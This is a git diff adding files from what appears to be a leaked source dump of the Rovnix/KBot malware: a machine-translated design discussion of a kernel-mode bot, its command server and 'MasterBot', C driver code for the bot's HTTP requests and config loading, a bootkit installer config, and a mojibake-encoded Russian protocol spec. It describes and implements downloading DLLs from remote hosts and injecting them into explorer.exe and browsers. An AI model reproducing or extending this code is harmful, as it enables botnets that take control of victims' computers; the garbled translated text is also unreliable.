diff --git a/Rovnix/_DUMP/0189830fee0864366db1b5605c466a4e5b055992.svn-base b/Rovnix/_DUMP/0189830fee0864366db1b5605c466a4e5b055992.svn-base
new file mode 100644
index 000000000..41d4437d3
--- /dev/null
+++ b/Rovnix/_DUMP/0189830fee0864366db1b5605c466a4e5b055992.svn-base
@@ -0,0 +1,160 @@
+1) Format Config. Boat because we have transformed into a server on the pitch. So
+Communication server only with the bot comes in a format that you are asking. For debugging
+we are well able to look like the contents of the config, but better
+optimize its safety and for your convenience.
+
+2) other matters at its discretion. All that would be reflected in the TOR.
+Let's first make a base on it and then we'll cheat. Now we go into the
+yuzeragentov discuss what is necessary to put a bot server masterbota yet. GET
+POST, or let him decide cheater.
+
+Boat : able to receive files from the server to write to the vfs and run , can delete files
+of vfs, can return the content vfs ( tell the server what dll successfully
+loading ) , has a unique Haydee , who can transfer dll ( eg
+through file 1726353.bid (bot id) which is at the vfs), is able to list
+server at specified intervals to receive instructions , can initiate inject
+dll ( located in the vfs) in the process .
+
+Server: receives from the bot information recorded in the database, receives MasterBota
+instructions for bots (in fact, for each boat has its own guide , maybe the database is updated
+and update the database at a particular bot which the file can be removed and which is
+added ) returns MasterBotu dump the database for analysis and a sid (server id). Incidentally,
+The database can be stored on the vfs ( work with) and simply transfer it MasterBotu and
+MasterBota received from new over the old one to overwrite . It is only necessary for the database
+provide versioning .
+
+MasterBot communicates with the server, gets the current database, instructs
+(Actually updates the database) for bots, transfers dll, which is in the database.
+
+MasterBot received from the database server lays out in its local folder. C: \ brownie_db \
+To provide masterbota start with parameters: ip server, the path to the database, which
+it is necessary to fill in the destination ip. Run masterbot with the parameters he knocks on the ip,
+poluchetsya database from the server transmits its disabled.
+
+We said that the communication server and encrypted bot. When you create a bot and server
+masterbota need them to sign the certificate. Bot did not listen to someone else's server,
+the server has not received instructions from someone else masterbota. As this moment to protect?
+
+The database contains: Haydee bot contents vfs, date of last otstuk .
+I think for each server to determine the maximum number of serviced bots ,
+Nk example , if the server banging bot is not in the list of Nk , the server
+will block the connection. What For? 1 ) we manage stress , 2 ) to transfer the database masterbotu
+where a limited number of records is always faster . 3 ) MasterBot itself will be removed from the database
+old boots .
+
+If there is a free cheater , then we can make a small dll to collect information about the target
+system. In order not to sew it into the loader . 
+
+What will be able to:
+
+- When creating sutured it to the list of URLs ostuka
+- Ticking off at the start and every N hours (specified in the configuration )
+- Returns a list of installed software
+- Returns the configuration PC
+- Returns the user name
+- Returns the system language
+- Returns the time zone
+- Drawn to the url, it requests a file path , which must be returned .
+- Drawn to the url, queries mask , returns a list of files to appropriate mask.
+
+
+> insufficient documentation for use
+
+> currently not clear (bk):
+> 1 . how to attach to and run arbitrary instaleru dll ? documentation
+> Kldr32.cfg - configuration file to attach to the DLL , 32- bit
+> driver.
+> Kldr64.cfg - configuration file for attachment DLL to a 64 -bit
+> driver.
+> Demo32.dll - 32- bit demo library .
+> Demo64.dll - the 64 -bit demo library .
+
+> project data files are missing , are mentioned only in the readme.txt.
+> maybe something was not added to the Suggested version
+This outdated information . The project is using kernelnogo bot implies that
+ Any DLL will be loaded from a bot network. Poet configuration files to build the installer does not
+ provide information to attach to the DLL driver.
+Let us know if this functionality is required, - make appropriate configs .
+
+> 2 . not describes how the distribution config , the assembly is set
+> kbot.ini, how to upgrade in the future?
+ Config file for a specific bot ( or group of bots ) is given by a team of SET_CONFIG MB.
+ Boat requests configuration timer (parameter ConfigPeriod in KBOT.INI).
+ This is the same INI file , it is stored in the bots VFS and used in the future.
+ Example KBOT.INI folder \ BkBuild.
+ 
+> what is written in the dock is encrypted , and how a signature , but what format
+> Data and how to attach signature?
+ Sign the file can be a utility CT (BSRV \ CT), or if the secret key is attached to the MB32 ( 64 ) .EXE is
+ signed file automatically when loading it to the server ( and the team SET_TASK SET_CONFIG).
+
+> the same with the teams , it is not clear how to shape the text file
+> sign it ,
+ A text file is generated with any text editor . Encoding - ANSI. Signed by the utility CT:
+CT -s < secret key > < source file > < output file >
+ or, if the private key is attached to the MB32 ( 64 ) .EXE is
+ signed file automatically when loading it to the server ( and the team SET_TASK SET_CONFIG).
+ 
+> Is it possible to download multiple files simultaneously? if so, what
+> Format command ?
+ No , SET_TASK SET_CONFIG and charged with one file or a group of bots bot .
+ The command file can be several teams, each must begin on a new line .
+
+> may not be assumed without masterbota operation , but this is still
+> I write below .
+
+> 3.KBOT: function SET_INJECT < file name on the VFS> < list of processes >
+> it is not clear that inject , dll, exe? < list of processes > comma ?
+
+an example of the file:
+LOAD_FILE http://mydomain.com/myfile.dll my.dll; http://mydomain.com/myfile.dll loads and stores
+; under the name my.dll
+SET_INJECT my.dll explorer.exe iexplore.exe; asks to inject MY.DLL in the process explorer.exe and iexplore.exe
+
+
+> server (SRV)
+> 1 . It does not describe the format of data storage server .
+> records:
+> BASE < path to file> - downloads from the current database server and clients
+> sohrayaet it to the specified file .
+> it is not clear that this is stored in the database
+ The user ID , the time the record was created , last otstuk , IP and User-Agent record was created ,
+ IP and User-Agent last otstuk , ID group , the current configuration file ( name , CRC32, installation date )
+ the current command file ( name , CRC32, installation date ) .
+Now the database is stored in an internal format of the server. Tool to Convert give with the first update.
+
+> 2.SET_CONFIG (SET_TASK) <ID> < name of the file on the server > [ limit ]
+> MB.exe sign all by herself or her hands each time will have to be attached
+> Certificates ? unfortunately I am not able to gather and see this
+> utility .
+
+Sign itself if the utility was attached a secret key. This is done by running the bat- nick
+ bkbuild \ bkbuild.bat.
+ 
+> are lacking in examples of the commands. if there is one car that
+> like everything is clear , if there are 10 , it is necessary to join and give each
+> command through the console ?
+Yes. If you have multiple servers , you need the trailer to each in turn.
+How to do better?
+
+> 3 . in paragraph 2 for BK mentioned the work without a master bot.
+> I understand that after loading the boat progruzhat server.dll and how that
+> start, it contains a configuration for the initial work , then this
+> vehicle becomes both client and server.
+> client side allows the server to upgrade and update the configuration
+> server . and the server , in turn, provides access to other currently
+> servers.
+ That's right . You can specify inject server.dll in any system process , such as services.exe.
+ 
+> in the case of data transfer to downstream MB are also stored in the non-
+> signed the form , just as files vfs ( config or something else )
+> How is it supposed to be used ? Install on " their " server ?
+Here I would like to read more . I did not understand the question.
+
+> to understand how he must have a complete set of certificates for
+> to distribute config files ,
+> download at " another " car will be safe ? "
+Assuming that the file or subscribes to the local computer operator , or,
+ uploaded to the server utility MB.EXE, which contains the secret key again, with
+ local computer operator .
+ Under this scheme seketny key only on the computer operator .
diff --git a/Rovnix/_DUMP/08a5fa2d9015f0c83e14bd598d20220736ad8c96.svn-base b/Rovnix/_DUMP/08a5fa2d9015f0c83e14bd598d20220736ad8c96.svn-base
new file mode 100644
index 000000000..0570bc464
--- /dev/null
+++ b/Rovnix/_DUMP/08a5fa2d9015f0c83e14bd598d20220736ad8c96.svn-base
@@ -0,0 +1,121 @@
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+// KBot project.
+//	
+// module: sendrecv.c
+// $Revision: 29 $
+// $Date: 2012-05-30 11:47:28 +0400 (Ср, 30 май 2012) $
+// description: 
+//	Kernel-mode client program.
+//	Send and receive data functions.
+
+#include <Ntifs.h>
+#include <ntddk.h>
+#include <ntimage.h>
+#define NTSTRSAFE_NO_DEPRECATE
+#include <ntstrsafe.h>
+
+#include "version.h"
+#include "ntddkex.h"
+#include "kdbg.h"
+
+#include "inaddr.h"
+#include "kipapi.h"
+#include "..\khttp\khttp.h"
+
+#include "..\kiplib\kstream.h"
+
+#include "kbot.h"
+#include "kbotinc.h"
+
+NTSTATUS	KBotRequest(
+	IN	PCHAR	Host,
+	IN	PCHAR	Uri,
+	IN	PCHAR	Method,
+	OUT	PCHAR*	pBuffer,
+	OUT	PULONG	pSize
+	)
+{
+	NTSTATUS	ntStatus = STATUS_INSUFFICIENT_RESOURCES;
+	HANDLE		hSession = 0, hConnect = 0, hRequest = 0;
+	PKSTREAM	pStream = NULL;
+	PCHAR		Buffer = NULL;
+
+	KdPrint(("KBOT: request \"%s %s%s\"\n", Method, Host, Uri));
+
+	do	// not a loop 
+	{
+		ULONG	Status = 0, sLen = sizeof(ULONG), Total = 0;
+		BOOL	Ret;
+
+		if (!(Buffer = KBotAlloc(KBOT_CONTENT_BUFFER_SIZE)))
+			break;
+
+		if (!(pStream = KStreamAllocate()))
+			break;
+
+		if (!(hSession = KHttpOpen(g_KbotUserAgent, 0, NULL, NULL, 0)))
+			break;
+
+		if (!(hConnect = KHttpConnect(hSession, Host, KHTTP_DEFAULT_HTTP_PORT, 0)))
+		{
+			ntStatus = STATUS_CONNECTION_REFUSED;
+			break;
+		}
+
+		ntStatus = STATUS_REQUEST_NOT_ACCEPTED;
+
+		if (!(hRequest = KHttpOpenRequest(hConnect, Method, Uri, NULL, NULL, NULL, 0)))
+			break;
+
+		if (!(Ret = KHttpSendRequest(hRequest, NULL, 0, NULL, 0, 0, 0)))
+			break;
+
+		if (!(Ret = KHttpReceiveResponse(hRequest, NULL)))
+			break;
+
+		if (!KHttpQueryHeaders(hRequest, KHTTP_QUERY_STATUS_CODE, NULL, &Status, &sLen, NULL))
+			break;
+
+		if (Status != KHTTP_STATUS_OK)
+			break;
+		
+		while(KHttpReadData(hRequest, Buffer, KBOT_CONTENT_BUFFER_SIZE, &sLen) && sLen != 0)
+		{
+			KStreamWrite(pStream, Buffer, sLen);
+			Total += sLen;
+		}
+
+		KBotFree(Buffer);
+
+		if (sLen = KStreamGetLength(pStream))
+		{
+			if (!(Buffer = KBotAlloc(sLen + 1)))
+				break;
+
+			KStreamRead(pStream, Buffer, sLen);
+			Buffer[sLen] = 0;
+
+			*pBuffer = Buffer;
+		}	// if (sLen = KStreamGetLength(pStream))
+
+		*pSize = sLen;
+		ntStatus = STATUS_SUCCESS;
+
+	} while(FALSE);
+
+	if (hRequest)
+		KHttpCloseHandle(hRequest);
+	if (hConnect)
+		KHttpCloseHandle(hConnect);
+	if (hSession)
+		KHttpCloseHandle(hSession);
+	if (pStream)
+		KStreamRelease(pStream);
+
+	if (!NT_SUCCESS(ntStatus))
+		KBotFree(Buffer);
+
+	KdPrint(("KBOT: request ended with status 0x%x\n", ntStatus));
+
+	return(ntStatus);
+}
diff --git a/Rovnix/_DUMP/1f33854ad0472d1cab56b394a5d99ce056469b6d.svn-base b/Rovnix/_DUMP/1f33854ad0472d1cab56b394a5d99ce056469b6d.svn-base
new file mode 100644
index 000000000..223172a99
--- /dev/null
+++ b/Rovnix/_DUMP/1f33854ad0472d1cab56b394a5d99ce056469b6d.svn-base
@@ -0,0 +1,444 @@
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+// KBot project.
+//	
+// module: config.c
+// $Revision: 34 $
+// $Date: 2012-08-23 15:11:38 +0400 (Чт, 23 авг 2012) $
+// description: 
+//	Config file processing engine.
+
+#include <Ntifs.h>
+#include <ntddk.h>
+#include <ntimage.h>
+#define NTSTRSAFE_NO_DEPRECATE
+#include <ntstrsafe.h>
+
+#include "version.h"
+#include "ntddkex.h"
+#include "kdbg.h"
+#include "joiner.h"
+#include "bklib.h"
+
+#include "..\crypto\crypto.h"
+#include "..\fslib\fslib.h"
+#include "..\bkdrv\bkdrv.h"
+
+#include "kbot.h"
+#include "kbotinc.h"
+
+#define	_TCHAR	CHAR
+
+
+typedef	struct _REQUEST_PARAMETER
+{
+	ULONG	NameHash;
+	ULONG	Flags;
+	PCHAR	pValue;
+} REQUEST_PARAMETER, *PREQUEST_PARAMETER;
+
+typedef struct _REQUEST_PARAMETERS
+{
+	ULONG				Count;
+	REQUEST_PARAMETER	Parameter[];
+} REQUEST_PARAMETERS, *PREQUEST_PARAMETERS;
+
+
+
+PKBOT_CONFIG volatile	g_KBotConfig = NULL;
+KBOT_USER				g_KBotUserId = {0};
+//
+//	Allocates a memory buffer and duplicates the specified source string into it.
+//
+static	LPTSTR DupString(
+	LPTSTR	SourceStr,
+	ULONG	MinimumLength
+	)
+{
+	LPTSTR	DestStr;
+	ULONG	Size = max((strlen(SourceStr) + 1) * sizeof(_TCHAR), MinimumLength * sizeof(_TCHAR));
+	if (DestStr = KBotAlloc(Size))
+	{
+		RtlZeroMemory(DestStr, Size);
+		strcpy(DestStr, SourceStr);
+	}
+	
+	return(DestStr);
+}
+
+
+//
+//	Parses the specified buffer containg lines of parameter strings like:
+//	 NAME = VALUE
+//	Allocates and fills REQUEST_PARAMETERS structure with name hashes and parameter values.
+//
+NTSTATUS ParseParamFile(
+	PCHAR	ParamStr,					// buffer containg lines of parameter strings
+	PREQUEST_PARAMETERS* ppParameters,	// variable to return pointer to REQUEST_PARAMETERS structure
+	BOOL	bCaseSensitive				// specifies how to parse parameter names and values: case sensitive or not
+	)
+{
+	NTSTATUS ntStatus = STATUS_SUCCESS;
+	PCHAR	pStr, cStr = ParamStr;
+	ULONG	Count = 0;
+	PREQUEST_PARAMETERS	pParams;
+
+	// Calculating maximum number of parameters in the file
+	while(cStr = strchr(cStr, '='))
+	{
+		Count += 1;
+		cStr += 1;
+	}
+
+	if (Count)
+	{
+		// Allocating REQUEST_PARAMETER structure
+		if (pParams = KBotAlloc(sizeof(REQUEST_PARAMETERS) + Count * sizeof(REQUEST_PARAMETER)))
+		{
+			PREQUEST_PARAMETER pParam = (PREQUEST_PARAMETER)&pParams->Parameter;
+			pParams->Count = 0;
+
+			do 
+			{
+				if ((pStr = strchr(ParamStr, '\r')) || (pStr = strchr(ParamStr, '\n')))
+				{
+					*pStr = 0;
+					pStr += 1;
+				}
+
+				if (cStr = strchr(ParamStr, ';'))
+					*cStr = 0;
+
+				if (cStr = strchr(ParamStr, '='))
+				{
+					if (!bCaseSensitive)
+					{
+						ANSI_STRING As;
+						// Converting to upper case
+						RtlInitAnsiString(&As, ParamStr);
+						RtlUpperString(&As, &As);
+					}
+
+					*cStr = 0;
+					cStr += 1;
+
+					strtrim(ParamStr, " \t\r\n");
+					strtrim(cStr, " \t");
+
+					if (*ParamStr)
+					{
+						pParam->NameHash = BkCRC32(ParamStr, strlen(ParamStr));
+						pParam->pValue = cStr;
+						pParams->Count += 1;
+						pParam += 1;
+					}
+				}	// if (cStr = StrChr(ParamStr, '='))
+			} while(ParamStr = pStr);
+
+			*ppParameters = pParams;
+			ASSERT(ntStatus == STATUS_SUCCESS);
+
+		}	// if (pParams = hAlloc(sizeof(REQUEST_PARAMETERS) + Count * sizeof(REQUEST_PARAMETER)))
+		else
+			ntStatus = STATUS_INSUFFICIENT_RESOURCES;
+	}	// if (Count)
+	else
+		ntStatus = STATUS_INVALID_PARAMETER;
+
+	return(ntStatus);
+}
+
+
+//
+//	Scans the specified REQUEST_PARAMETERS structure for a parameter with the specified Name hash.
+//	Returns pointer to the value of the parameter or NULL if the parameter not found.
+//
+PCHAR GetParamValue(
+	ULONG NameHash,
+	PREQUEST_PARAMETERS	pParameters
+	)
+{
+	PCHAR	pValue = NULL;
+	ULONG	i;
+
+	if (pParameters)
+	{
+		for (i=0; i<pParameters->Count; i++)
+		{
+			if (pParameters->Parameter[i].NameHash == NameHash)
+			{
+				pValue = pParameters->Parameter[i].pValue;
+				break;
+			}
+		}	// for (i=0; i<pParameters->Count; i++)
+	}	// if (pParameters)
+
+	return(pValue);
+}
+
+//
+//	Parses the specified pHostList string into multiple strings devided by ','.
+//	Allocates and fills a pHostArray array with pointers to those strings.
+//
+NTSTATUS BuildHostArray(
+	PCHAR	pHostList,
+	PCHAR**	pHostArray,
+	PULONG	pNumberHosts
+	)
+{
+	NTSTATUS ntStatus = STATUS_SUCCESS;
+	PCHAR	cStr = pHostList;
+	ULONG	Count = 1;
+	PCHAR*	HostArray;
+
+	// Calculating maximum number of hosts in the list
+	while(cStr = strchr(cStr, ','))
+	{
+		Count += 1;
+		cStr += 1;
+	}
+
+	if (HostArray = (PCHAR*)KBotAlloc(Count * sizeof(PCHAR)))
+	{
+		Count = 0;
+		do
+		{
+			HostArray[Count] = pHostList;
+			if (pHostList = strchr(pHostList, ','))
+			{
+				*pHostList = 0;
+				pHostList += 1;
+			}
+			strtrim(HostArray[Count], " \t");
+			Count += 1;
+		} while(pHostList);
+
+		*pHostArray = HostArray;
+		*pNumberHosts = Count;
+
+	}	// if (HostArray = KBotAlloc(Count * sizeof(PCHAR)))
+	else
+		ntStatus = STATUS_INSUFFICIENT_RESOURCES;
+
+	return(ntStatus);
+}
+
+
+//
+//	Releases the specified configuration structure.
+//	Cleans up parameters, frees memory.
+//
+VOID KBotReleaseConfig(
+	PKBOT_CONFIG Config
+	)
+{
+	ASSERT_KBOT_CONFIG(Config);
+	if (Config->HostArray)
+		KBotFree(Config->HostArray);
+	if (Config->pHostList)
+		KBotFree(Config->pHostList);
+	if (Config->pKey)
+		KBotFree(Config->pKey);
+#if DBG
+	Config->Magic = 0;
+#endif
+	KBotFree(Config);
+}
+
+
+//
+//	Initializes KBOT global configuration structure with the specified parameters.
+//
+static NTSTATUS	KBotInitConfig(
+	PREQUEST_PARAMETERS	pIniParams,
+	ULONG	ConfigCRC				// CRC32 hash of the config file
+	)
+{
+	NTSTATUS		ntStatus = STATUS_INSUFFICIENT_RESOURCES;
+	PKBOT_CONFIG	Config;
+	PCHAR			pHostList, pValue;
+	ULONG			uValue;
+
+	do	// not a loop
+	{
+		// Creating new configuration structure
+		if (!(Config = MyAllocatePool(PagedPool, sizeof(KBOT_CONFIG))))
+		{
+			ASSERT(ntStatus == STATUS_INSUFFICIENT_RESOURCES);
+			break;
+		}
+		RtlZeroMemory(Config, sizeof(KBOT_CONFIG));
+
+#if DBG
+		Config->Magic = KBOT_CONFIG_MAGIC;
+#endif
+		Config->ConfigCRC = ConfigCRC;
+			
+		// Processing configuration file parameters:
+		//  RC6-key used for obfuscating requests
+		if (!(pValue = GetParamValue(CRC_KEY, pIniParams)))
+			pValue = SERVER_DEFAULT_KEY;
+
+		if (!(Config->pKey = DupString(pValue, sizeof(RC6_KEY))))
+		{
+			ASSERT(ntStatus == STATUS_INSUFFICIENT_RESOURCES);
+			break;
+		}
+
+		//	active host list
+		if ((pValue = GetParamValue(CRC_HOSTS, pIniParams)) && *(strtrim(pValue, " \t")) != 0 && (pValue = DupString(pValue, 0)))
+			Config->pHostList = pValue;
+		else
+			pValue = DupString(KBOT_DEFAULT_HOST_LIST, 0);
+
+		if (!(NT_SUCCESS(ntStatus = BuildHostArray(pValue, &Config->HostArray, &Config->HostCount))))
+			break;
+		Config->HostIndex = 0;
+
+		//	group ID
+		if ((pValue = GetParamValue(CRC_GROUP, pIniParams)) && (uValue = strtol(pValue, NULL, 0)))
+			Config->GroupId = uValue;
+		else
+			Config->GroupId = KBOT_DEFAULT_GROUP_ID;
+
+		//	config update period
+		if ((pValue = GetParamValue(CRC_CONFIG_PERIOD, pIniParams)) && (uValue = strtol(pValue, NULL, 0)))
+			Config->ConfigPeriod = uValue;
+		else
+			Config->ConfigPeriod = KBOT_DEFAULT_CONFIG_PERIOD;
+		
+		//	task update period
+		if ((pValue = GetParamValue(CRC_TASK_PERIOD, pIniParams)) && (uValue = strtol(pValue, NULL, 0)))
+			Config->TaskPeriod = uValue;
+		else
+			Config->TaskPeriod = KBOT_DEFAULT_TASK_PERIOD;
+
+		Config->MinimumPeriod = KBOT_MINIMUM_REQUEST_PERIOD;
+
+		KdPrint(("KBOT: global configuration data initialized\n"));
+
+		ntStatus = STATUS_SUCCESS;
+	} while(FALSE);
+
+	if (NT_SUCCESS(ntStatus))
+	{
+		if (Config = InterlockedExchangePointer(&g_KBotConfig, Config))
+			KBotReleaseConfig(Config);
+	}
+	else
+	{
+		if (Config)
+			KBotReleaseConfig(Config);
+	}
+
+	return(ntStatus);
+}
+
+//
+//	Loads the specified file, decrypts it and verifies its' digital signature.
+//
+NTSTATUS LoadUnsignFile(
+	PANSI_STRING FileName,	// VFS-based file name
+	PCHAR*	pFileData,		// variable that receives a buffer with decrypted file data
+	PULONG	pFileSize,		// variable that receives the size of the buffer
+	PULONG	pFileCRC		// variable that receives original file CRC
+	)
+{
+	NTSTATUS ntStatus;
+	PCHAR	pFile, uFile;
+	ULONG	Size, uSize;
+
+	if (NT_SUCCESS(ntStatus = FsLoadFile(FileName, (PCHAR*)&pFile, &Size)) && Size)
+	{
+		*pFileCRC = BkCRC32(pFile, Size);
+
+		KdPrint(("KBOT: config 0x%X loaded from a file\n", *pFileCRC));
+
+#ifdef _USE_DIGITAL_SIGNATURE
+		if (!g_KbotPublicKey || !(uSize = DsUnsign(pFile, Size, &uFile, g_KbotPublicKey)))
+		{
+			ntStatus = STATUS_SYSTEM_IMAGE_BAD_SIGNATURE;
+			KdPrint(("KBOT: config file verification failed\n"));
+		}
+		else
+		{
+			*pFileData = uFile;
+			*pFileSize = uSize;
+			ASSERT(ntStatus == STATUS_SUCCESS);
+			KdPrint(("KBOT: config file successfully verified\n"));
+		}
+
+		MyFreePool(pFile);
+#else
+		*pFileData = pFile;
+		*pFileSize = Size;
+		ASSERT(ntStatus == STATUS_SUCCESS);
+#endif
+	}	// if (NT_SUCCESS(ntStatus = FsLoadFile(FileName, (PCHAR*)&pFile, &Size)))
+
+	return(ntStatus);
+}
+
+//
+//	Tries to loads KBOT configuration file from the VFS root directory and from the current driver module.
+//	Initializes global configuration structure.
+//
+NTSTATUS KBotLoadConfig(VOID)
+{
+	NTSTATUS		ntStatus;
+	PCHAR			pConfigFile = NULL;
+	ULONG			ConfigSize, ConfigCRC = 0;
+	ANSI_STRING		aConfigName = RTL_CONSTANT_STRING(szKBotConfigFileName);
+	PREQUEST_PARAMETERS	pIniParams = NULL;
+
+	// Looking for a configuration file within the VFS root directory
+	if (NT_SUCCESS(LoadUnsignFile(&aConfigName, (PCHAR*)&pConfigFile, &ConfigSize, &ConfigCRC)) ||
+		// Trying to load the configuration file attached to the driver
+		GetJoinedData((PIMAGE_DOS_HEADER)BkImageBase, &pConfigFile, &ConfigSize, FALSE, CRC_KBOT_INI, 0))
+	{
+		// There is the configuration file, parsing it...
+		ASSERT(pConfigFile[ConfigSize] == 0);
+		ParseParamFile(pConfigFile, &pIniParams, FALSE);
+	}	// if (NT_SUCCESS(FsLoadFile(&aConfigName, (PCHAR*)&Config, &Size)) ||
+	else
+	{
+		KdPrint(("KBOT: file \"%s\" not found. Using defaults\n", szKBotConfigFileName));
+	}
+
+	ntStatus = KBotInitConfig(pIniParams, ConfigCRC);
+
+	if (pIniParams)
+		KBotFree(pIniParams);
+	if (pConfigFile)
+		MyFreePool(pConfigFile);
+
+	return(ntStatus);
+}
+
+
+VOID KBotGetUserId(VOID)
+{
+	PCHAR	pUserIdFile;
+	ULONG	UserIdSize;
+
+	ANSI_STRING		aUserIdName = RTL_CONSTANT_STRING(szKBotUserIdFileName);
+
+	// Looking for the user ID file stored within the VFS root directory
+	if (NT_SUCCESS(FsLoadFile(&aUserIdName, (PCHAR*)&pUserIdFile, &UserIdSize)) && UserIdSize == sizeof(KBOT_USER))
+	{
+		// User ID file found and loaded
+		memcpy(&g_KBotUserId, pUserIdFile, UserIdSize);
+		MyFreePool(pUserIdFile);
+		KdPrint(("KBOT: user ID loaded from a file\n"));
+	}
+	else
+	{
+		// No user ID file found
+		LARGE_INTEGER	Ticks;
+		KeQueryTickCount(&Ticks);
+
+		BkGuidFromSeed(&g_KBotUserId.Id, &Ticks.LowPart);
+		FsSaveFile(&aUserIdName, (PCHAR)&g_KBotUserId.Id, sizeof(KBOT_USER));
+
+		KdPrint(("KBOT: new user ID created\n"));
+	}
+}
diff --git a/Rovnix/_DUMP/38eba669e7f65f690d0f9636c1d450223f382b55.svn-base b/Rovnix/_DUMP/38eba669e7f65f690d0f9636c1d450223f382b55.svn-base
new file mode 100644
index 000000000..b291e4f0e
--- /dev/null
+++ b/Rovnix/_DUMP/38eba669e7f65f690d0f9636c1d450223f382b55.svn-base
@@ -0,0 +1,27 @@
+; Êîíôèãóðàöèîííûé ôàéë äëÿ óòèëèòû FJ
+; Îïèñûâàåò äðàéâåðà, êîòîðûå íåîáõîäèìî ïðèêðåïèòü ê èíñòàëëåðó
+; Ïðè çàïóñêå èíñòàëëåð îïðåäåëÿåò ðàçðÿäíîñòü ÎÑ è óñòàíàâëèâàåò ñîîòâåòñòâóþùèé äðàéâåð
+
+
+; Íà÷àëüíûé çàãðóç÷èê
+BIN: Release\vbr.com
+
+
+; Äðàéâåð äëÿ 32õ-áèòíîé ÎÑ
+DRV: ..\bin\Release\i386\kloader.sys
+
+; Îòêðûòûé RSA-êëþ÷ äëÿ ïðîâåðêè ïîäïèñè ôàéëîâ
+BIN: public.key
+
+; Êîíôèãóðàöèîííûé ôàéë ìîäóëÿ KBOT
+BIN: kbot.ini
+
+
+; Äðàéâåð äëÿ 64õ-áèòíîé ÎÑ
+DRV: ..\bin\release\amd64\kloader.sys
+
+; Îòêðûòûé RSA-êëþ÷ äëÿ ïðîâåðêè ïîäïèñè ôàéëîâ
+BIN: public.key
+
+; Êîíôèãóðàöèîííûé ôàéë ìîäóëÿ KBOT
+BIN: kbot.ini
diff --git a/Rovnix/_DUMP/7aa3977f419f2d8cd8e28c20a6e9e483f2482598.svn-base b/Rovnix/_DUMP/7aa3977f419f2d8cd8e28c20a6e9e483f2482598.svn-base
new file mode 100644
index 000000000..d8481b968
--- /dev/null
+++ b/Rovnix/_DUMP/7aa3977f419f2d8cd8e28c20a6e9e483f2482598.svn-base
@@ -0,0 +1,45 @@
+Êåðíåëüíûé áîò
+
+Â äàííûé ìîìåíò ðåàëèçîâàí ñëåäóþùèé ôóíêöèîíàë:
+Áîò ïðåäñòàâëÿåò ñîáîé äðàéâåð, çàãðóæàåìûé ïîñðåäñòâîì áóòêèò-ëîàäåðà. Äðàéâåð ñîäåðæèò ñâîé TCP\IP ñòåê è 
+ ðåàëèçàöèþ HTTP. Ïîñëå èíèöèàëèçàöèè áîò ñîçäàåò òàéìåð, ïî êîòîðîìó îáðàùàåòñÿ (ïîñðåäñòâîì HTTP) íà 
+ çàäàííûé URL, óêàçûâàþùèé íà PHP ñêðèïò, êîòîðûé âîçâðàùàåò êîíôèã-ôàéë. Â êîíôèãå ñîäåðæàòñÿ êîìàíäû òèïà: 
+  "DLL: http://myhost.com/myfile.dll, file1.dll, explorer.exe iexplore.exe firefox.exe"
+ Áîò ñêà÷èâàåò (÷åðåç HTTP) ôàéë myhost.com/myfile.dll, ñîõðàíÿåò åãî íà VFS êàê file1.dll, è ðåãèñòðèðóåò
+ file1.dll äëÿ àâòîìàòè÷åñêîãî èíæåêòà â ïðîöåññû: explorer.exe, iexplore.exe, firefox.exe.
+
+×òî íåîáõîäèìî äëÿ äàëüíåéøåé ðàçðàáîòêè:
+
+1. Ñîãëàñîâàòü ôîðìàò êîíôèã-ôàéëà
+Ñåé÷àñ èñïîëüçóåòñÿ îáû÷íûé òåêñòîâûé ôàéë, îïèñàííûé âûøå.
+Âîçìîæíî, åñòü ñìûñë äîáàâèòü â êîíôèã-ôàéë òàêèå ïàðàìåòðû êàê: ñïèñîê ñåðâåðîâ äëÿ ïîëó÷åíèÿ êîíôèãà, ñòðîêà
+ (ñêðèïò è ïàðàìåòðû) äëÿ îáðàùåíèÿ çà êîíôèãîì, ïåðèîä îáðàùåíèÿ çà êîíôèãîì. ×òî-òî åùå?
+Âîçìîæíî, ñòîèò èñïîëüçîâàòü êîíâåðòîð (êîíôèãóðàòîð) äëÿ ïðåîáðàçîâàíèÿ òåêñòîâîãî êîíôèã-ôàéëà â  
+ îïðåäåëåííûé ôîðìàò, ñ öåëüþ óáðàòü ïàðñåð òåêñòà èç áîòà, ÷òî óìåíüøèò åãî ðàçìåð è ñíèçèò âåðîÿòíîñòü
+ îøèáîê.
+Ôîðìàò êîìàíä: Êîìàíäû äëÿ äîáàâëåíèÿ DLL íà çàãðóçêó, äëÿ óäàëåíèÿ DLL, äëÿ îáíîâëåíèÿ è òï. Êîìàíäû äëÿ
+ ðàáîòû ñ äðàéâåðàìè?
+
+2. Ñîãëàñîâàòü ôîðìàò çàïðîñà êîíôèãà
+Ñåé÷àñ áîò ðàáîòàåò ñ íàøèì òåñòîâûì ñåðâåðîì, ôîðìàò çàïðîñà ñëåäóþùèé:
+GET /config.php?version=100&user=1234&server=1&id=1000&crc=3201b37f
+ãäå: version - âåðñèÿ áîòà, user - óíèêàëüíûé ID êëèåíòà, server - ID ñåðâåðà, id - ãðóïïà áîòà, crc - CRC32 
+ ïðåäûäóùåãî êîíôèãà (èñïîëüçóåòñÿ äëÿ òîãî, ÷òîáû íå âûäàâàòü îäèí êîíôèã ïîâòîðíî)
+
+÷òî íóæíî èçìåíèòü:
+- òèï çàïðîñà: GET èëè POST ?
+- èìÿ ñêðèïòà, âîçâðàùàþùåãî êîíôèã
+- ïàðàìåòðû ñêðèïòà: ID êëèåíòà, Âåðñèÿ áîòà, ID ñåðâåðà, CRC32 ïðåäûäóùåãî êîíôèãà, ÷òî-òî åùå?
+- äîï. ïàðàìåòðû HTTP çàïðîñà: âåðñèÿ è àðõèòåêòóðà ÎÑ (User-Agent), Referer, ÷òî-òî åùå?
+- ?
+
+3. ×òî-òî åùå, ÷òî ÿ íå ó÷åë?
+
+
+Åñëè ó çàêàç÷èêà óæå åñòü ðàáîòàþùèé ñåðâåð ñ àäìèíêîé, ïîçâîëÿþùèé âûäàâàòü êîíôèãè, òî ïðîøó ïðåäîñòàâèòü
+- îïèñàíèå ôîðìàòà êîíôèãà
+- îïèñàíèå ïðòîêîëà âçàèìîäåéñòâèÿ
+òàêæå, ïðîøó äàòü âðåìåííûé äîñòóï ê ñåðâåðó, äëÿ äîðàáîòêè áîòà ïîä ïðîòîêîëû çàêàç÷èêà, è ïîñëåäóþùåãî
+ òåñòèðîâàíèÿ.
+
+
